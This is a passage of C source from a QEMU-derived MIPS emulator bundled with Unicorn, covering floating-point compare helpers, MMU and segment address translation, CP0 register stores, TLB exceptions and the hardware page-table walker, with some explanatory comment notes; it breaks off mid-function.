FOP_CONDN_D(ne, (float64_lt_quiet(fdt1, fdt0, &env->active_fpu.fp_status) || float64_lt_quiet(fdt0, fdt1, &env->active_fpu.fp_status))) FOP_CONDN_D(sor, (float64_le(fdt1, fdt0, &env->active_fpu.fp_status) || float64_le(fdt0, fdt1, &env->active_fpu.fp_status))) FOP_CONDN_D(sune, (float64_unordered(fdt1, fdt0, &env->active_fpu.fp_status) || float64_lt(fdt1, fdt0, &env->active_fpu.fp_status) || float64_lt(fdt0, fdt1, &env->active_fpu.fp_status))) FOP_CONDN_D(sne, (float64_lt(fdt1, fdt0, &env->active_fpu.fp_status) || float64_lt(fdt0, fdt1, &env->active_fpu.fp_status))) #define FOP_CONDN_S(op, cond) \ uint32_t helper_r6_cmp_s_ ## op(CPUMIPSState *env, uint32_t fst0, \ uint32_t fst1) \ { \ uint64_t c; \ c = cond; \ update_fcr31(env, GETPC()); \ if (c) { \ return -1; \ } else { \ return 0; \ } \ } /* * NOTE: the comma operator will make "cond" to eval to false, * but float32_unordered_quiet() is still called. 
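*/

/*
 * Editor's note: unlike the pre-R6 helpers, these R6 CMP.cond.fmt
 * helpers return an all-ones or all-zero mask in the destination
 * register instead of setting an FCC bit, which is why the macro body
 * returns -1 or 0. The same idea in isolation (hypothetical name):
 */
#include <math.h>
#include <stdint.h>

static uint64_t r6_cmp_lt_d(double a, double b)
{
    return isless(a, b) ? ~(uint64_t)0 : 0;   /* -1 == all bits set */
}

/* (the NOTE above applies to the single-precision cmp.af.s case that follows)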
*/ FOP_CONDN_S(af, (float32_unordered_quiet(fst1, fst0, &env->active_fpu.fp_status), 0)) FOP_CONDN_S(un, (float32_unordered_quiet(fst1, fst0, &env->active_fpu.fp_status))) FOP_CONDN_S(eq, (float32_eq_quiet(fst0, fst1, &env->active_fpu.fp_status))) FOP_CONDN_S(ueq, (float32_unordered_quiet(fst1, fst0, &env->active_fpu.fp_status) || float32_eq_quiet(fst0, fst1, &env->active_fpu.fp_status))) FOP_CONDN_S(lt, (float32_lt_quiet(fst0, fst1, &env->active_fpu.fp_status))) FOP_CONDN_S(ult, (float32_unordered_quiet(fst1, fst0, &env->active_fpu.fp_status) || float32_lt_quiet(fst0, fst1, &env->active_fpu.fp_status))) FOP_CONDN_S(le, (float32_le_quiet(fst0, fst1, &env->active_fpu.fp_status))) FOP_CONDN_S(ule, (float32_unordered_quiet(fst1, fst0, &env->active_fpu.fp_status) || float32_le_quiet(fst0, fst1, &env->active_fpu.fp_status))) /* * NOTE: the comma operator makes "cond" evaluate to false, * but float32_unordered() is still called. */ FOP_CONDN_S(saf, (float32_unordered(fst1, fst0, &env->active_fpu.fp_status), 0)) FOP_CONDN_S(sun, (float32_unordered(fst1, fst0, &env->active_fpu.fp_status))) FOP_CONDN_S(seq, (float32_eq(fst0, fst1, &env->active_fpu.fp_status))) FOP_CONDN_S(sueq, (float32_unordered(fst1, fst0, &env->active_fpu.fp_status) || float32_eq(fst0, fst1, &env->active_fpu.fp_status))) FOP_CONDN_S(slt, (float32_lt(fst0, fst1, &env->active_fpu.fp_status))) FOP_CONDN_S(sult, (float32_unordered(fst1, fst0, &env->active_fpu.fp_status) || float32_lt(fst0, fst1, &env->active_fpu.fp_status))) FOP_CONDN_S(sle, (float32_le(fst0, fst1, &env->active_fpu.fp_status))) FOP_CONDN_S(sule, (float32_unordered(fst1, fst0, &env->active_fpu.fp_status) || float32_le(fst0, fst1, &env->active_fpu.fp_status))) FOP_CONDN_S(or, (float32_le_quiet(fst1, fst0, &env->active_fpu.fp_status) || float32_le_quiet(fst0, fst1, &env->active_fpu.fp_status))) FOP_CONDN_S(une, (float32_unordered_quiet(fst1, fst0, &env->active_fpu.fp_status) || float32_lt_quiet(fst1, fst0, &env->active_fpu.fp_status) || float32_lt_quiet(fst0, fst1, &env->active_fpu.fp_status))) FOP_CONDN_S(ne, (float32_lt_quiet(fst1, fst0, &env->active_fpu.fp_status) || float32_lt_quiet(fst0, fst1, &env->active_fpu.fp_status))) FOP_CONDN_S(sor, (float32_le(fst1, fst0, &env->active_fpu.fp_status) || float32_le(fst0, fst1, &env->active_fpu.fp_status))) FOP_CONDN_S(sune, (float32_unordered(fst1, fst0, &env->active_fpu.fp_status) || float32_lt(fst1, fst0, &env->active_fpu.fp_status) || float32_lt(fst0, fst1, &env->active_fpu.fp_status))) FOP_CONDN_S(sne, (float32_lt(fst1, fst0, &env->active_fpu.fp_status) || float32_lt(fst0, fst1, &env->active_fpu.fp_status)))
unicorn-2.1.1/qemu/target/mips/helper.c
/* * MIPS emulation
helpers for qemu. * * Copyright (c) 2004-2005 Jocelyn Mayer * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "internal.h" #include "exec/exec-all.h" #include "exec/cpu_ldst.h" #include "hw/mips/cpudevs.h" enum { TLBRET_XI = -6, TLBRET_RI = -5, TLBRET_DIRTY = -4, TLBRET_INVALID = -3, TLBRET_NOMATCH = -2, TLBRET_BADADDR = -1, TLBRET_MATCH = 0 }; /* no MMU emulation */ int no_mmu_map_address(CPUMIPSState *env, hwaddr *physical, int *prot, target_ulong address, int rw, int access_type) { *physical = address; *prot = PAGE_READ | PAGE_WRITE | PAGE_EXEC; return TLBRET_MATCH; } /* fixed mapping MMU emulation */ int fixed_mmu_map_address(CPUMIPSState *env, hwaddr *physical, int *prot, target_ulong address, int rw, int access_type) { if (address <= (int32_t)0x7FFFFFFFUL) { if (!(env->CP0_Status & (1 << CP0St_ERL))) { *physical = address + 0x40000000UL; } else { *physical = address; } } else if (address <= (int32_t)0xBFFFFFFFUL) { *physical = address & 0x1FFFFFFF; } else { *physical = address; } *prot = PAGE_READ | PAGE_WRITE | PAGE_EXEC; return TLBRET_MATCH; } /* MIPS32/MIPS64 R4000-style MMU emulation */ int r4k_map_address(CPUMIPSState *env, hwaddr *physical, int *prot, target_ulong address, int rw, int access_type) { uint16_t ASID = env->CP0_EntryHi & env->CP0_EntryHi_ASID_mask; uint32_t MMID = env->CP0_MemoryMapID; bool mi = !!((env->CP0_Config5 >> CP0C5_MI) & 1); uint32_t tlb_mmid; int i; MMID = mi ? MMID : (uint32_t) ASID; for (i = 0; i < env->tlb->tlb_in_use; i++) { r4k_tlb_t *tlb = &env->tlb->mmu.r4k.tlb[i]; /* 1k pages are not supported. */ target_ulong mask = tlb->PageMask | ~(TARGET_PAGE_MASK << 1); target_ulong tag = address & ~mask; target_ulong VPN = tlb->VPN & ~mask; #if defined(TARGET_MIPS64) tag &= env->SEGMask; #endif /* Check ASID/MMID, virtual page number & size */ tlb_mmid = mi ? tlb->MMID : (uint32_t) tlb->ASID; if ((tlb->G == 1 || tlb_mmid == MMID) && VPN == tag && !tlb->EHINV) { /* TLB match */ int n = !!(address & mask & ~(mask >> 1)); /* Check access rights */ if (!(n ? tlb->V1 : tlb->V0)) { return TLBRET_INVALID; } if (rw == MMU_INST_FETCH && (n ? tlb->XI1 : tlb->XI0)) { return TLBRET_XI; } if (rw == MMU_DATA_LOAD && (n ? tlb->RI1 : tlb->RI0)) { return TLBRET_RI; } if (rw != MMU_DATA_STORE || (n ? tlb->D1 : tlb->D0)) { *physical = tlb->PFN[n] | (address & (mask >> 1)); *prot = PAGE_READ; if (n ? tlb->D1 : tlb->D0) { *prot |= PAGE_WRITE; } if (!(n ? tlb->XI1 : tlb->XI0)) { *prot |= PAGE_EXEC; } return TLBRET_MATCH; } return TLBRET_DIRTY; } } return TLBRET_NOMATCH; } static int is_seg_am_mapped(unsigned int am, bool eu, int mmu_idx) { /* * Interpret access control mode and mmu_idx. * AdE? TLB? 
* AM K S U E K S U E * UK 0 0 1 1 0 0 - - 0 * MK 1 0 1 1 0 1 - - !eu * MSK 2 0 0 1 0 1 1 - !eu * MUSK 3 0 0 0 0 1 1 1 !eu * MUSUK 4 0 0 0 0 0 1 1 0 * USK 5 0 0 1 0 0 0 - 0 * - 6 - - - - - - - - * UUSK 7 0 0 0 0 0 0 0 0 */ int32_t adetlb_mask; switch (mmu_idx) { case 3: /* ERL */ /* If EU is set, always unmapped */ if (eu) { return 0; } /* fall through */ case MIPS_HFLAG_KM: /* Never AdE, TLB mapped if AM={1,2,3} */ adetlb_mask = 0x70000000; goto check_tlb; case MIPS_HFLAG_SM: /* AdE if AM={0,1}, TLB mapped if AM={2,3,4} */ adetlb_mask = 0xc0380000; goto check_ade; case MIPS_HFLAG_UM: /* AdE if AM={0,1,2,5}, TLB mapped if AM={3,4} */ adetlb_mask = 0xe4180000; /* fall through */ check_ade: /* does this AM cause AdE in current execution mode */ if ((adetlb_mask << am) < 0) { return TLBRET_BADADDR; } adetlb_mask <<= 8; /* fall through */ check_tlb: /* is this AM mapped in current execution mode */ return ((adetlb_mask << am) < 0); default: assert(0); return TLBRET_BADADDR; }; } static int get_seg_physical_address(CPUMIPSState *env, hwaddr *physical, int *prot, target_ulong real_address, int rw, int access_type, int mmu_idx, unsigned int am, bool eu, target_ulong segmask, hwaddr physical_base) { int mapped = is_seg_am_mapped(am, eu, mmu_idx); if (mapped < 0) { /* is_seg_am_mapped can report TLBRET_BADADDR */ return mapped; } else if (mapped) { /* The segment is TLB mapped */ return env->tlb->map_address(env, physical, prot, real_address, rw, access_type); } else { /* The segment is unmapped */ *physical = physical_base | (real_address & segmask); *prot = PAGE_READ | PAGE_WRITE | PAGE_EXEC; return TLBRET_MATCH; } } static int get_segctl_physical_address(CPUMIPSState *env, hwaddr *physical, int *prot, target_ulong real_address, int rw, int access_type, int mmu_idx, uint16_t segctl, target_ulong segmask) { unsigned int am = (segctl & CP0SC_AM_MASK) >> CP0SC_AM; bool eu = (segctl >> CP0SC_EU) & 1; hwaddr pa = ((hwaddr)segctl & CP0SC_PA_MASK) << 20; return get_seg_physical_address(env, physical, prot, real_address, rw, access_type, mmu_idx, am, eu, segmask, pa & ~(hwaddr)segmask); } static int get_physical_address(CPUMIPSState *env, hwaddr *physical, int *prot, target_ulong real_address, int rw, int access_type, int mmu_idx) { /* User mode can only access useg/xuseg */ #if defined(TARGET_MIPS64) int user_mode = mmu_idx == MIPS_HFLAG_UM; int supervisor_mode = mmu_idx == MIPS_HFLAG_SM; int kernel_mode = !user_mode && !supervisor_mode; int UX = (env->CP0_Status & (1 << CP0St_UX)) != 0; int SX = (env->CP0_Status & (1 << CP0St_SX)) != 0; int KX = (env->CP0_Status & (1 << CP0St_KX)) != 0; #endif int ret = TLBRET_MATCH; /* effective address (modified for KVM T&E kernel segments) */ target_ulong address = real_address; #define USEG_LIMIT ((target_ulong)(int32_t)0x7FFFFFFFUL) #define KSEG0_BASE ((target_ulong)(int32_t)0x80000000UL) #define KSEG1_BASE ((target_ulong)(int32_t)0xA0000000UL) #define KSEG2_BASE ((target_ulong)(int32_t)0xC0000000UL) #define KSEG3_BASE ((target_ulong)(int32_t)0xE0000000UL) #define KVM_KSEG0_BASE ((target_ulong)(int32_t)0x40000000UL) #define KVM_KSEG2_BASE ((target_ulong)(int32_t)0x60000000UL) #if 0 if (mips_um_ksegs_enabled()) { /* KVM T&E adds guest kernel segments in useg */ if (real_address >= KVM_KSEG0_BASE) { if (real_address < KVM_KSEG2_BASE) { /* kseg0 */ address += KSEG0_BASE - KVM_KSEG0_BASE; } else if (real_address <= USEG_LIMIT) { /* kseg2/3 */ address += KSEG2_BASE - KVM_KSEG2_BASE; } } } #endif if (address <= USEG_LIMIT) { /* useg */ uint16_t segctl; if (address >= 
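/*
 * Editor's note: the 32-bit MIPS address map gives this routine its
 * shape -- useg is the low 2 GiB, kseg0/kseg1 are (on a classic fixed
 * mapping) unmapped windows onto the low 512 MiB, and kseg2/kseg3 go
 * through the TLB; in this SegCtl-aware code the per-segment attributes
 * come from CP0_SegCtl0..2 instead of being hard-wired. The classic
 * unmapped cases in isolation (illustrative sketch, hypothetical name):
 *
 *   #include <stdint.h>
 *
 *   // returns 1 and fills *pa when va is in an unmapped kernel segment
 *   static int kseg_unmapped(uint32_t va, uint32_t *pa)
 *   {
 *       if (va >= 0x80000000u && va < 0xC0000000u) {  // kseg0 or kseg1
 *           *pa = va & 0x1FFFFFFFu;   // both alias the low 512 MiB
 *           return 1;
 *       }
 *       return 0;   // useg / kseg2 / kseg3: TLB or SegCtl decides
 *   }
 */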
0x40000000UL) { segctl = env->CP0_SegCtl2; } else { segctl = env->CP0_SegCtl2 >> 16; } ret = get_segctl_physical_address(env, physical, prot, real_address, rw, access_type, mmu_idx, segctl, 0x3FFFFFFF); #if defined(TARGET_MIPS64) } else if (address < 0x4000000000000000ULL) { /* xuseg */ if (UX && address <= (0x3FFFFFFFFFFFFFFFULL & env->SEGMask)) { ret = env->tlb->map_address(env, physical, prot, real_address, rw, access_type); } else { ret = TLBRET_BADADDR; } } else if (address < 0x8000000000000000ULL) { /* xsseg */ if ((supervisor_mode || kernel_mode) && SX && address <= (0x7FFFFFFFFFFFFFFFULL & env->SEGMask)) { ret = env->tlb->map_address(env, physical, prot, real_address, rw, access_type); } else { ret = TLBRET_BADADDR; } } else if (address < 0xC000000000000000ULL) { /* xkphys */ if ((address & 0x07FFFFFFFFFFFFFFULL) <= env->PAMask) { /* KX/SX/UX bit to check for each xkphys EVA access mode */ static const uint8_t am_ksux[8] = { [CP0SC_AM_UK] = (1u << CP0St_KX), [CP0SC_AM_MK] = (1u << CP0St_KX), [CP0SC_AM_MSK] = (1u << CP0St_SX), [CP0SC_AM_MUSK] = (1u << CP0St_UX), [CP0SC_AM_MUSUK] = (1u << CP0St_UX), [CP0SC_AM_USK] = (1u << CP0St_SX), [6] = (1u << CP0St_KX), [CP0SC_AM_UUSK] = (1u << CP0St_UX), }; unsigned int am = CP0SC_AM_UK; unsigned int xr = (env->CP0_SegCtl2 & CP0SC2_XR_MASK) >> CP0SC2_XR; if (xr & (1 << ((address >> 59) & 0x7))) { am = (env->CP0_SegCtl1 & CP0SC1_XAM_MASK) >> CP0SC1_XAM; } /* Does CP0_Status.KX/SX/UX permit the access mode (am) */ if (env->CP0_Status & am_ksux[am]) { ret = get_seg_physical_address(env, physical, prot, real_address, rw, access_type, mmu_idx, am, false, env->PAMask, 0); } else { ret = TLBRET_BADADDR; } } else { ret = TLBRET_BADADDR; } } else if (address < 0xFFFFFFFF80000000ULL) { /* xkseg */ if (kernel_mode && KX && address <= (0xFFFFFFFF7FFFFFFFULL & env->SEGMask)) { ret = env->tlb->map_address(env, physical, prot, real_address, rw, access_type); } else { ret = TLBRET_BADADDR; } #endif } else if (address < KSEG1_BASE) { /* kseg0 */ ret = get_segctl_physical_address(env, physical, prot, real_address, rw, access_type, mmu_idx, env->CP0_SegCtl1 >> 16, 0x1FFFFFFF); } else if (address < KSEG2_BASE) { /* kseg1 */ ret = get_segctl_physical_address(env, physical, prot, real_address, rw, access_type, mmu_idx, env->CP0_SegCtl1, 0x1FFFFFFF); } else if (address < KSEG3_BASE) { /* sseg (kseg2) */ ret = get_segctl_physical_address(env, physical, prot, real_address, rw, access_type, mmu_idx, env->CP0_SegCtl0 >> 16, 0x1FFFFFFF); } else { /* * kseg3 * XXX: debug segment is not emulated */ ret = get_segctl_physical_address(env, physical, prot, real_address, rw, access_type, mmu_idx, env->CP0_SegCtl0, 0x1FFFFFFF); } return ret; } void cpu_mips_tlb_flush(CPUMIPSState *env) { /* Flush qemu's TLB and discard all shadowed entries. */ tlb_flush(env_cpu(env)); env->tlb->tlb_in_use = env->tlb->nb_tlb; } /* Called for updates to CP0_Status. 
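*/

/*
 * Editor's note: the CP0 store helpers below all follow one pattern --
 * a per-register writable-bit mask decides which bits of the guest
 * value land in the architectural register, and everything else keeps
 * its old contents. Isolated, the idiom is:
 */
#include <stdint.h>

/* keep read-only bits of 'old', take writable bits from 'val' */
static uint32_t masked_store(uint32_t old, uint32_t val, uint32_t rw_mask)
{
    return (old & ~rw_mask) | (val & rw_mask);
}

/* Called for updates to CP0_Status.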
*/ void sync_c0_status(CPUMIPSState *env, CPUMIPSState *cpu, int tc) { int32_t tcstatus, *tcst; uint32_t v = cpu->CP0_Status; uint32_t cu, mx, asid, ksu; uint32_t mask = ((1 << CP0TCSt_TCU3) | (1 << CP0TCSt_TCU2) | (1 << CP0TCSt_TCU1) | (1 << CP0TCSt_TCU0) | (1 << CP0TCSt_TMX) | (3 << CP0TCSt_TKSU) | (0xff << CP0TCSt_TASID)); cu = (v >> CP0St_CU0) & 0xf; mx = (v >> CP0St_MX) & 0x1; ksu = (v >> CP0St_KSU) & 0x3; asid = env->CP0_EntryHi & env->CP0_EntryHi_ASID_mask; tcstatus = cu << CP0TCSt_TCU0; tcstatus |= mx << CP0TCSt_TMX; tcstatus |= ksu << CP0TCSt_TKSU; tcstatus |= asid; if (tc == cpu->current_tc) { tcst = &cpu->active_tc.CP0_TCStatus; } else { tcst = &cpu->tcs[tc].CP0_TCStatus; } *tcst &= ~mask; *tcst |= tcstatus; compute_hflags(cpu); } void cpu_mips_store_status(CPUMIPSState *env, target_ulong val) { uint32_t mask = env->CP0_Status_rw_bitmask; target_ulong old = env->CP0_Status; if (env->insn_flags & ISA_MIPS32R6) { bool has_supervisor = extract32(mask, CP0St_KSU, 2) == 0x3; #if defined(TARGET_MIPS64) uint32_t ksux = (1 << CP0St_KX) & val; ksux |= (ksux >> 1) & val; /* KX = 0 forces SX to be 0 */ ksux |= (ksux >> 1) & val; /* SX = 0 forces UX to be 0 */ val = (val & ~(7 << CP0St_UX)) | ksux; #endif if (has_supervisor && extract32(val, CP0St_KSU, 2) == 0x3) { mask &= ~(3 << CP0St_KSU); } mask &= ~(((1 << CP0St_SR) | (1 << CP0St_NMI)) & val); } env->CP0_Status = (old & ~mask) | (val & mask); #if defined(TARGET_MIPS64) if ((env->CP0_Status ^ old) & (old & (7 << CP0St_UX))) { /* Access to at least one of the 64-bit segments has been disabled */ tlb_flush(env_cpu(env)); } #endif if (env->CP0_Config3 & (1 << CP0C3_MT)) { sync_c0_status(env, env, env->current_tc); } else { compute_hflags(env); } } void cpu_mips_store_cause(CPUMIPSState *env, target_ulong val) { uint32_t mask = 0x00C00300; if (env->insn_flags & ISA_MIPS32R2) { mask |= 1 << CP0Ca_DC; } if (env->insn_flags & ISA_MIPS32R6) { mask &= ~((1 << CP0Ca_WP) & val); } env->CP0_Cause = (env->CP0_Cause & ~mask) | (val & mask); #if 0 uint32_t old = env->CP0_Cause; if ((old ^ env->CP0_Cause) & (1 << CP0Ca_DC)) { if (env->CP0_Cause & (1 << CP0Ca_DC)) { cpu_mips_stop_count(env); } else { cpu_mips_start_count(env); } } int i; /* Set/reset software interrupts */ for (i = 0 ; i < 2 ; i++) { if ((old ^ env->CP0_Cause) & (1 << (CP0Ca_IP + i))) { cpu_mips_soft_irq(env, i, env->CP0_Cause & (1 << (CP0Ca_IP + i))); } } #endif } static void raise_mmu_exception(CPUMIPSState *env, target_ulong address, int rw, int tlb_error) { CPUState *cs = env_cpu(env); int exception = 0, error_code = 0; if (rw == MMU_INST_FETCH) { error_code |= EXCP_INST_NOTAVAIL; } switch (tlb_error) { default: case TLBRET_BADADDR: /* Reference to kernel address from user mode or supervisor mode */ /* Reference to supervisor address from user mode */ if (rw == MMU_DATA_STORE) { exception = EXCP_AdES; } else { exception = EXCP_AdEL; } break; case TLBRET_NOMATCH: /* No TLB match for a mapped address */ if (rw == MMU_DATA_STORE) { exception = EXCP_TLBS; } else { exception = EXCP_TLBL; } error_code |= EXCP_TLB_NOMATCH; break; case TLBRET_INVALID: /* TLB match with no valid bit */ if (rw == MMU_DATA_STORE) { exception = EXCP_TLBS; } else { exception = EXCP_TLBL; } break; case TLBRET_DIRTY: /* TLB match but 'D' bit is cleared */ exception = EXCP_LTLBL; break; case TLBRET_XI: /* Execute-Inhibit Exception */ if (env->CP0_PageGrain & (1 << CP0PG_IEC)) { exception = EXCP_TLBXI; } else { exception = EXCP_TLBL; } break; case TLBRET_RI: /* Read-Inhibit Exception */ if (env->CP0_PageGrain & (1 << 
CP0PG_IEC)) { exception = EXCP_TLBRI; } else { exception = EXCP_TLBL; } break; } /* Raise exception */ if (!(env->hflags & MIPS_HFLAG_DM)) { env->CP0_BadVAddr = address; } env->CP0_Context = (env->CP0_Context & ~0x007fffff) | ((address >> 9) & 0x007ffff0); env->CP0_EntryHi = (env->CP0_EntryHi & env->CP0_EntryHi_ASID_mask) | (env->CP0_EntryHi & (1 << CP0EnHi_EHINV)) | (address & (TARGET_PAGE_MASK << 1)); #if defined(TARGET_MIPS64) env->CP0_EntryHi &= env->SEGMask; env->CP0_XContext = (env->CP0_XContext & ((~0ULL) << (env->SEGBITS - 7))) | /* PTEBase */ (extract64(address, 62, 2) << (env->SEGBITS - 9)) | /* R */ (extract64(address, 13, env->SEGBITS - 13) << 4); /* BadVPN2 */ #endif cs->exception_index = exception; env->error_code = error_code; } hwaddr mips_cpu_get_phys_page_debug(CPUState *cs, vaddr addr) { MIPSCPU *cpu = MIPS_CPU(cs); CPUMIPSState *env = &cpu->env; hwaddr phys_addr; int prot; if (get_physical_address(env, &phys_addr, &prot, addr, 0, ACCESS_INT, cpu_mmu_index(env, false)) != 0) { return -1; } return phys_addr; } #if !defined(TARGET_MIPS64) /* * Perform hardware page table walk * * Memory accesses are performed using the KERNEL privilege level. * Synchronous exceptions detected on memory accesses cause a silent exit * from page table walking, resulting in a TLB or XTLB Refill exception. * * Implementations are not required to support page table walk memory * accesses from mapped memory regions. When an unsupported access is * attempted, a silent exit is taken, resulting in a TLB or XTLB Refill * exception. * * Note that if an exception is caused by AddressTranslation or LoadMemory * functions, the exception is not taken, a silent exit is taken, * resulting in a TLB or XTLB Refill exception. */ static bool get_pte(CPUMIPSState *env, uint64_t vaddr, int entry_size, uint64_t *pte) { if ((vaddr & ((entry_size >> 3) - 1)) != 0) { return false; } if (entry_size == 64) { *pte = cpu_ldq_code(env, vaddr); } else { *pte = cpu_ldl_code(env, vaddr); } return true; } static uint64_t get_tlb_entry_layout(CPUMIPSState *env, uint64_t entry, int entry_size, int ptei) { uint64_t result = entry; uint64_t rixi; if (ptei > entry_size) { ptei -= 32; } result >>= (ptei - 2); rixi = result & 3; result >>= 2; result |= rixi << CP0EnLo_XI; return result; } static int walk_directory(CPUMIPSState *env, uint64_t *vaddr, int directory_index, bool *huge_page, bool *hgpg_directory_hit, uint64_t *pw_entrylo0, uint64_t *pw_entrylo1) { int dph = (env->CP0_PWCtl >> CP0PC_DPH) & 0x1; int psn = (env->CP0_PWCtl >> CP0PC_PSN) & 0x3F; int hugepg = (env->CP0_PWCtl >> CP0PC_HUGEPG) & 0x1; int pf_ptew = (env->CP0_PWField >> CP0PF_PTEW) & 0x3F; int ptew = (env->CP0_PWSize >> CP0PS_PTEW) & 0x3F; int native_shift = (((env->CP0_PWSize >> CP0PS_PS) & 1) == 0) ? 2 : 3; int directory_shift = (ptew > 1) ? -1 : (hugepg && (ptew == 1)) ? native_shift + 1 : native_shift; int leaf_shift = (ptew > 1) ? -1 : (ptew == 1) ? 
native_shift + 1 : native_shift; uint32_t direntry_size = 1 << (directory_shift + 3); uint32_t leafentry_size = 1 << (leaf_shift + 3); uint64_t entry; uint64_t paddr; int prot; uint64_t lsb = 0; uint64_t w = 0; if (get_physical_address(env, &paddr, &prot, *vaddr, MMU_DATA_LOAD, ACCESS_INT, cpu_mmu_index(env, false)) != TLBRET_MATCH) { /* wrong base address */ return 0; } if (!get_pte(env, *vaddr, direntry_size, &entry)) { return 0; } if ((entry & (1ULL << psn)) && hugepg) { *huge_page = true; *hgpg_directory_hit = true; entry = get_tlb_entry_layout(env, entry, leafentry_size, pf_ptew); w = directory_index - 1; if (directory_index & 0x1) { /* Generate adjacent page from same PTE for odd TLB page */ lsb = (1 << w) >> 6; *pw_entrylo0 = entry & ~lsb; /* even page */ *pw_entrylo1 = entry | lsb; /* odd page */ } else if (dph) { int oddpagebit = 1 << leaf_shift; uint64_t vaddr2 = *vaddr ^ oddpagebit; if (*vaddr & oddpagebit) { *pw_entrylo1 = entry; } else { *pw_entrylo0 = entry; } if (get_physical_address(env, &paddr, &prot, vaddr2, MMU_DATA_LOAD, ACCESS_INT, cpu_mmu_index(env, false)) != TLBRET_MATCH) { return 0; } if (!get_pte(env, vaddr2, leafentry_size, &entry)) { return 0; } entry = get_tlb_entry_layout(env, entry, leafentry_size, pf_ptew); if (*vaddr & oddpagebit) { *pw_entrylo0 = entry; } else { *pw_entrylo1 = entry; } } else { return 0; } return 1; } else { *vaddr = entry; return 2; } } static bool page_table_walk_refill(CPUMIPSState *env, vaddr address, int rw, int mmu_idx) { int gdw = (env->CP0_PWSize >> CP0PS_GDW) & 0x3F; int udw = (env->CP0_PWSize >> CP0PS_UDW) & 0x3F; int mdw = (env->CP0_PWSize >> CP0PS_MDW) & 0x3F; int ptw = (env->CP0_PWSize >> CP0PS_PTW) & 0x3F; int ptew = (env->CP0_PWSize >> CP0PS_PTEW) & 0x3F; /* Initial values */ bool huge_page = false; bool hgpg_bdhit = false; bool hgpg_gdhit = false; bool hgpg_udhit = false; bool hgpg_mdhit = false; int32_t pw_pagemask = 0; target_ulong pw_entryhi = 0; uint64_t pw_entrylo0 = 0; uint64_t pw_entrylo1 = 0; /* Native pointer size */ /*For the 32-bit architectures, this bit is fixed to 0.*/ int native_shift = (((env->CP0_PWSize >> CP0PS_PS) & 1) == 0) ? 2 : 3; /* Indices from PWField */ int pf_gdw = (env->CP0_PWField >> CP0PF_GDW) & 0x3F; int pf_udw = (env->CP0_PWField >> CP0PF_UDW) & 0x3F; int pf_mdw = (env->CP0_PWField >> CP0PF_MDW) & 0x3F; int pf_ptw = (env->CP0_PWField >> CP0PF_PTW) & 0x3F; int pf_ptew = (env->CP0_PWField >> CP0PF_PTEW) & 0x3F; /* Indices computed from faulting address */ int gindex = (address >> pf_gdw) & ((1 << gdw) - 1); int uindex = (address >> pf_udw) & ((1 << udw) - 1); int mindex = (address >> pf_mdw) & ((1 << mdw) - 1); int ptindex = (address >> pf_ptw) & ((1 << ptw) - 1); /* Other HTW configs */ int hugepg = (env->CP0_PWCtl >> CP0PC_HUGEPG) & 0x1; /* HTW Shift values (depend on entry size) */ int directory_shift = (ptew > 1) ? -1 : (hugepg && (ptew == 1)) ? native_shift + 1 : native_shift; int leaf_shift = (ptew > 1) ? -1 : (ptew == 1) ? 
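/*
 * Editor's note: the walker carves per-level indices out of the faulting
 * address using a shift from CP0_PWField and a width from CP0_PWSize,
 * i.e. index = (addr >> shift) & ((1 << width) - 1), as the gindex /
 * uindex / mindex / ptindex computations above show. As a tiny
 * stand-alone helper (hypothetical name pt_index, widths below 64):
 *
 *   #include <stdint.h>
 *
 *   static unsigned pt_index(uint64_t addr, unsigned shift, unsigned width)
 *   {
 *       return (unsigned)((addr >> shift) & ((1ULL << width) - 1));
 *   }
 *
 * e.g. shift = pf_gdw and width = gdw yields the global-directory index.
 */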
native_shift + 1 : native_shift; /* Offsets into tables */ int goffset = gindex << directory_shift; int uoffset = uindex << directory_shift; int moffset = mindex << directory_shift; int ptoffset0 = (ptindex >> 1) << (leaf_shift + 1); int ptoffset1 = ptoffset0 | (1 << (leaf_shift)); uint32_t leafentry_size = 1 << (leaf_shift + 3); /* Starting address - Page Table Base */ uint64_t vaddr = env->CP0_PWBase; uint64_t dir_entry; uint64_t paddr; int prot; int m; if (!(env->CP0_Config3 & (1 << CP0C3_PW))) { /* walker is unimplemented */ return false; } if (!(env->CP0_PWCtl & (1 << CP0PC_PWEN))) { /* walker is disabled */ return false; } if (!(gdw > 0 || udw > 0 || mdw > 0)) { /* no structure to walk */ return false; } if ((directory_shift == -1) || (leaf_shift == -1)) { return false; } /* Global Directory */ if (gdw > 0) { vaddr |= goffset; switch (walk_directory(env, &vaddr, pf_gdw, &huge_page, &hgpg_gdhit, &pw_entrylo0, &pw_entrylo1)) { case 0: return false; case 1: goto refill; case 2: default: break; } } /* Upper directory */ if (udw > 0) { vaddr |= uoffset; switch (walk_directory(env, &vaddr, pf_udw, &huge_page, &hgpg_udhit, &pw_entrylo0, &pw_entrylo1)) { case 0: return false; case 1: goto refill; case 2: default: break; } } /* Middle directory */ if (mdw > 0) { vaddr |= moffset; switch (walk_directory(env, &vaddr, pf_mdw, &huge_page, &hgpg_mdhit, &pw_entrylo0, &pw_entrylo1)) { case 0: return false; case 1: goto refill; case 2: default: break; } } /* Leaf Level Page Table - First half of PTE pair */ vaddr |= ptoffset0; if (get_physical_address(env, &paddr, &prot, vaddr, MMU_DATA_LOAD, ACCESS_INT, cpu_mmu_index(env, false)) != TLBRET_MATCH) { return false; } if (!get_pte(env, vaddr, leafentry_size, &dir_entry)) { return false; } dir_entry = get_tlb_entry_layout(env, dir_entry, leafentry_size, pf_ptew); pw_entrylo0 = dir_entry; /* Leaf Level Page Table - Second half of PTE pair */ vaddr |= ptoffset1; if (get_physical_address(env, &paddr, &prot, vaddr, MMU_DATA_LOAD, ACCESS_INT, cpu_mmu_index(env, false)) != TLBRET_MATCH) { return false; } if (!get_pte(env, vaddr, leafentry_size, &dir_entry)) { return false; } dir_entry = get_tlb_entry_layout(env, dir_entry, leafentry_size, pf_ptew); pw_entrylo1 = dir_entry; refill: m = (1 << pf_ptw) - 1; if (huge_page) { switch (hgpg_bdhit << 3 | hgpg_gdhit << 2 | hgpg_udhit << 1 | hgpg_mdhit) { case 4: m = (1 << pf_gdw) - 1; if (pf_gdw & 1) { m >>= 1; } break; 